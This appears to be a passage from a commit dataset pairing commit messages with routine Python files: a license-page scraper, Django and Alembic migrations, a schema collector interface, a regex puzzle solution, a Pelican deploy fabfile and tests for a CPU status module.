return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
<commit_before><commit_msg>Add CLI tool that crawls choosealicense for OSS licenses.<commit_after>
|
import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
Add CLI tool that crawls choosealicense for OSS licenses.import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
<commit_before><commit_msg>Add CLI tool that crawls choosealicense for OSS licenses.<commit_after>import sys
import click
import requests
from bs4 import BeautifulSoup
from crayons import green, red
from notary import LICENSE_DIR
BASE_URL = "https://choosealicense.com"
LICENSES_URL = "{0}/licenses/".format(BASE_URL)
class License(object):
def __init__(self, url, slug, name, content):
self.url = url
self.slug = slug
self.name = name
self.content = content
self.path = LICENSE_DIR.joinpath("{0}.md".format(self.slug))
def __repr__(self):
return "<License slug: {0}, name: {1}".format(self.slug, self.name)
def open(self, *args, **kwargs):
return self.path.open('w')
@click.group()
def cli():
"""Fetch licenses from https://choosealicense.com/."""
@cli.command('run', short_help="scrape {0} licenses".format(BASE_URL))
def run():
"""
Crawls https://choosealicense.com/licenses and fetches all open source license urls.
It then crawls each individual license page and stores it in the {LICENSE_DIR}
folder, under {slug}.md.
"""
response = requests.get(LICENSES_URL)
if response.status_code != 200:
click.echo(
"URL {0} returned status {1}".
format(green(LICENSES_URL), red(response.status_code))
)
sys.exit(1)
soup = BeautifulSoup(response.content, 'html.parser')
url_tuples = [
(BASE_URL, license_overview.div.h3.a.get('href'))
for license_overview in soup.find_all('div', {'class': 'license-overview'})
]
with click.progressbar(
iterable=url_tuples, show_pos=True, label="Fetching licenses"
) as urls:
for url_tuple in urls:
click.echo()
url = ''.join(url_tuple)
response = requests.get(url)
license_soup = BeautifulSoup(response.content, 'html.parser')
try:
lic = License(
url,
url_tuple[1].split('/')[2],
license_soup.h1.string,
license_soup.find(id='license-text').string
)
with lic.open('w') as f:
f.write(lic.content)
click.echo("Finished crawling {0}.".format(green(url)))
except AttributeError:
click.echo("Could not fetch license from {0}".format(green(url)))
if __name__ == '__main__':
cli()
|
|
5e4f960e8caf488533eb38d943e1da8c4a260631
|
bluebottle/funding/migrations/0062_auto_20201222_1241.py
|
bluebottle/funding/migrations/0062_auto_20201222_1241.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
Add migration that adds donor permission to staff
|
Add migration that adds donor permission to staff
|
Python
|
bsd-3-clause
|
onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle
|
Add migration that adds donor permission to staff
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
<commit_before><commit_msg>Add migration that adds donor permission to staff<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
Add migration that adds donor permission to staff# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
<commit_before><commit_msg>Add migration that adds donor permission to staff<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-11 12:19
from __future__ import unicode_literals
from django.db import migrations
from bluebottle.utils.utils import update_group_permissions
def add_group_permissions(apps, schema_editor):
group_perms = {
'Staff': {
'perms': (
'change_donor',
)
},
}
update_group_permissions('funding', group_perms, apps)
class Migration(migrations.Migration):
dependencies = [
('funding', '0061_auto_20201202_1044'),
]
operations = [
migrations.RunPython(add_group_permissions)
]
|
|
79c074133d51fa5ac1193756e01e26b5245a4b97
|
source/harmony/schema/collector.py
|
source/harmony/schema/collector.py
|
# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
Add standard interface for collecting schemas.
|
Add standard interface for collecting schemas.
|
Python
|
apache-2.0
|
4degrees/harmony
|
Add standard interface for collecting schemas.
|
# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
<commit_before><commit_msg>Add standard interface for collecting schemas.<commit_after>
|
# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
Add standard interface for collecting schemas.# :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
|
<commit_before><commit_msg>Add standard interface for collecting schemas.<commit_after># :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
from abc import ABCMeta, abstractmethod
class Collector(object):
'''Collect and return schemas.'''
__metaclass__ = ABCMeta
@abstractmethod
def collect(self):
'''Yield collected schemas.
Each schema should be a Python dictionary.
'''
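To show how the abstract interface is meant to be used, a subclass only needs to provide collect. Below is a minimal hypothetical collector that reads schemas from JSON files on disk; the class name and directory layout are assumptions for illustration only:

import json
import os

class FilesystemCollector(Collector):
    '''Collect schemas from *.json files in a directory.'''

    def __init__(self, directory):
        self.directory = directory

    def collect(self):
        '''Yield each schema found on disk as a Python dictionary.'''
        for name in sorted(os.listdir(self.directory)):
            if name.endswith('.json'):
                with open(os.path.join(self.directory, name)) as f:
                    yield json.load(f)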
|
|
fa2a7d10522233b7287dfda28854be961868a40f
|
CodeFights/increaseNumberRoundness.py
|
CodeFights/increaseNumberRoundness.py
|
#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
Solve Code Fights increase number roundness problem
|
Solve Code Fights increase number roundness problem
|
Python
|
mit
|
HKuz/Test_Code
|
Solve Code Fights increase number roundness problem
|
#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Solve Code Fights increase number roundness problem<commit_after>
|
#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
Solve Code Fights increase number roundness problem#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Solve Code Fights increase number roundness problem<commit_after>#!/usr/local/bin/python
# Code Fights Increase Number Roundness Problem
import re
def increaseNumberRoundness(n):
pattern = re.compile(r'0+[1-9]+')
return bool(re.search(pattern, str(n)))
def main():
tests = [
[902200100, True],
[11000, False],
[99080, True],
[1022220, True],
[106611, True],
[234230, False],
[888, False],
[100, False],
[1000000000, False],
[103456789, True]
]
for t in tests:
res = increaseNumberRoundness(t[0])
ans = t[1]
if ans == res:
print("PASSED: increaseNumberRoundness({}) returned {}"
.format(t[0], res))
else:
print("FAILED: increaseNumberRoundness({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
|
|
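The regex 0+[1-9]+ matches zeros that sit to the left of a nonzero digit, i.e. interior zeros that could be pushed to the end to make the number "rounder". An equivalent regex-free sketch (name changed to avoid clashing with the record's function), scanning digits from least to most significant:

    def increase_number_roundness_arith(n):
        # Roundness can increase exactly when some zero has a nonzero digit
        # to its right; scanning from the least significant digit, that means
        # hitting a zero after a nonzero digit has already been seen.
        seen_nonzero = False
        while n > 0:
            n, digit = divmod(n, 10)
            if digit != 0:
                seen_nonzero = True
            elif seen_nonzero:
                return True
        return False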
096fbae1461d66f84b203d8a49ea3ae65a3f4bd4
|
alembic/versions/fa8cf884aa8e_migrate_to_jsonb.py
|
alembic/versions/fa8cf884aa8e_migrate_to_jsonb.py
|
"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
Migrate info tables to JSONB format.
|
Migrate info tables to JSONB format.
NOTE: this will only delete the materialized view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.
|
Python
|
agpl-3.0
|
Scifabric/pybossa,PyBossa/pybossa,Scifabric/pybossa,PyBossa/pybossa
|
Migrate info tables to JSONB format.
NOTE: this will only delete the materialized view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.
|
"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
<commit_before><commit_msg>Migrate info tables to JSONB format.
NOTE: this will only delete the materialized view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.<commit_after>
|
"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
Migrate info tables to JSONB format.
NOTE: this will only delete the materialized view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them."""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
<commit_before><commit_msg>Migrate info tables to JSONB format.
NOTE: this will only delete the materialized view users_rank. If you have
your own leaderboards based on info keys of the user, then you will have
to delete them manually or it will fail. Then, your background jobs will
recreate them.<commit_after>"""migrate to jsonb
Revision ID: fa8cf884aa8e
Revises: a7e8a70b1772
Create Date: 2018-02-05 16:13:38.229076
"""
# revision identifiers, used by Alembic.
revision = 'fa8cf884aa8e'
down_revision = 'a7e8a70b1772'
from alembic import op
import sqlalchemy as sa
tables = ['user', 'task', 'task_run', 'result']
def upgrade():
for table in tables:
if table == 'user':
query = 'DROP MATERIALIZED VIEW users_rank'
op.execute(query)
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE jsonb USING info::jsonb;''' % table
op.execute(query)
def downgrade():
for table in tables:
query = '''ALTER TABLE "%s" ALTER COLUMN info SET DATA TYPE json USING info::json;''' % table
op.execute(query)
|
|
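The practical payoff of json -> jsonb is operator and index support. An illustrative follow-up (not part of this commit; the index name is invented) showing what the new column type enables:

    # A GIN index on the now-jsonb column lets containment queries such as
    #   SELECT * FROM "task" WHERE info @> '{"priority": 1}';
    # use the index instead of a sequential scan.
    op.execute('CREATE INDEX task_info_gin_idx ON "task" USING gin (info);')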
2aa977c55e59d9f92db31c773e6533537fad780b
|
fabfile.py
|
fabfile.py
|
from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
    """Publish to GitHub Pages"""
    env.msg = commit_message
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
Add fabric configuration for deploy
|
Add fabric configuration for deploy
|
Python
|
mit
|
PythonNepal/pythonnepal.github.io
|
Add fabric configuration for deploy
|
from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
    """Publish to GitHub Pages"""
    env.msg = commit_message
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
<commit_before><commit_msg>Add fabric configuration for deploy<commit_after>
|
from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
    """Publish to GitHub Pages"""
    env.msg = commit_message
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
Add fabric configuration for deployfrom fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
    """Publish to GitHub Pages"""
    env.msg = commit_message
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
<commit_before><commit_msg>Add fabric configuration for deploy<commit_after>from fabric.api import *
import os
import sys
import shutil
import SimpleHTTPServer
import SocketServer
# Local path configuration (can be absolute or relative to fabfile)
env.deploy_path = 'output'
DEPLOY_PATH = env.deploy_path
# Branch to push on GitHub
env.gp_branch = 'master'
env.msg = 'Update blog'
SERVER = '127.0.0.1'
PORT = 8000
def clean():
"""Remove generated files"""
if os.path.isdir(DEPLOY_PATH):
shutil.rmtree(DEPLOY_PATH)
os.makedirs(DEPLOY_PATH)
def build():
"""Build local version of site"""
local('pelican -s pelicanconf.py')
def rebuild():
"""`clean` then `build`"""
clean()
build()
def regenerate():
"""Automatically regenerate site upon file modification"""
local('pelican -r -s pelicanconf.py')
def serve():
os.chdir(env.deploy_path)
PORT = 8000
class AddressReuseTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
server = AddressReuseTCPServer(('', PORT), SimpleHTTPServer.SimpleHTTPRequestHandler)
sys.stderr.write('Serving on port {0} ...\n'.format(PORT))
server.serve_forever()
def reserve():
"""`build`, then `serve`"""
build()
serve()
def preview():
"""Build production version of site"""
local('pelican -s publishconf.py')
def publish(commit_message):
    """Publish to GitHub Pages"""
    env.msg = commit_message
clean()
preview()
local("ghp-import -m '{msg}' -b {gp_branch} {deploy_path}".format(**env))
local("git push origin {gp_branch}".format(**env))
|
|
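Usage sketch for the tasks above, assuming the classic Fabric 1.x "fab" CLI is on the PATH:

    #   fab rebuild serve          # clean, regenerate, then preview locally
    #   fab publish:"New post"     # build with publishconf.py, push gh-pages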
69dceca7d089b356a6a259592640aebf6cdeaece
|
tests/modules/test_cpu.py
|
tests/modules/test_cpu.py
|
# pylint: disable=C0103,C0111
import json
import unittest
import mock
import tests.mocks as mocks
from bumblebee.config import Config
from bumblebee.input import I3BarInput, LEFT_MOUSE
from bumblebee.modules.cpu import Module
class TestCPUModule(unittest.TestCase):
def setUp(self):
self._stdin, self._select, self.stdin, self.select = mocks.epoll_mock("bumblebee.input")
self.popen = mocks.MockPopen()
self._psutil = mock.patch("bumblebee.modules.cpu.psutil")
self.psutil = self._psutil.start()
self.config = Config()
self.input = I3BarInput()
self.engine = mock.Mock()
self.engine.input = self.input
self.input.need_event = True
self.module = Module(engine=self.engine, config={ "config": self.config })
for widget in self.module.widgets():
widget.link_module(self.module)
self.anyWidget = widget
def tearDown(self):
self._stdin.stop()
self._select.stop()
self._psutil.stop()
self.popen.cleanup()
def test_format(self):
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
for widget in self.module.widgets():
            self.assertEqual(len(widget.full_text()), len("100.00%"))
def test_leftclick(self):
mocks.mouseEvent(stdin=self.stdin, button=LEFT_MOUSE, inp=self.input, module=self.module)
self.popen.assert_call("gnome-system-monitor")
def test_warning(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "18")
self.psutil.cpu_percent.return_value = 19.0
self.module.update_all()
self.assertTrue("warning" in self.module.state(self.anyWidget))
def test_critical(self):
self.config.set("cpu.critical", "20")
self.config.set("cpu.warning", "19")
self.psutil.cpu_percent.return_value = 21.0
self.module.update_all()
self.assertTrue("critical" in self.module.state(self.anyWidget))
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
Add unit tests for module cpu
|
[tests/cpu] Add unit tests for module cpu
|
Python
|
mit
|
tobi-wan-kenobi/bumblebee-status,tobi-wan-kenobi/bumblebee-status
|
